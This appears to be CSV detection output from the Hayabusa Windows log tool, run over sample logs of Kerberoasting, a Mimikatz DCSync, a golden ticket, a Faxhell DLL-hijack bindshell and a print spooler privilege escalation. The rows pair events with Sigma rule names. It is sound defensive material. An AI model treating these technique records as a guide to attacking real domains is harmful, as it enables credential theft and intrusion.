::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx 
+2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c41e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c703,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c741,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx 
+2020-08-02 21:02:37.200 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:37.212 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,../hayabusa-rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x11b8cd00,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: FS02$ | Computer: - | IP Addr: 10.23.42.18 | LID: 
0x11b8d014,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8d057,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8dcc1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9a8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x11b9e9d3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9e5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9ea1f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ 
| IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.567 
+09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Persis | Evas,Fax Service DLL Search Order Hijack,,../hayabusa-rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx +2020-08-03 01:24:07.559 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\pipey | Process: System | PID: 4 | PGUID: 
747F3D96-E303-5F26-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 864 | Tgt PGUID: 747F3D96-E309-5F26-0000-001021BC0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 820 | Tgt PGUID: 747F3D96-E309-5F26-0000-0010137B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
747F3D96-E303-5F26-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Users\IEUser\Tools\Misc\nc.exe | PID: 7836 | PGUID: 747F3D96-E8B8-5F26-0000-00100AA71A00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\FXSSVC.exe | PID: 5252 | PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x3e7 | PID: 8104 | PGUID: 747F3D96-E8BA-5F26-0000-001035BE1A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 588 | PGUID: 747F3D96-E8BC-5F26-0000-0010F7C41A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-12 22:04:27.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\Temp\__SKIP_1E14 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.454 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\{A6F2FD48-5F14-4B5F-ACC3-8DE2ACD8E384} | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 
747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRVUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File 
Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.INI | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL 
File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: 
C:\Windows\System32\spool\drivers\x64\3\New\UNIRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDNAMES.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDDTYPE.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 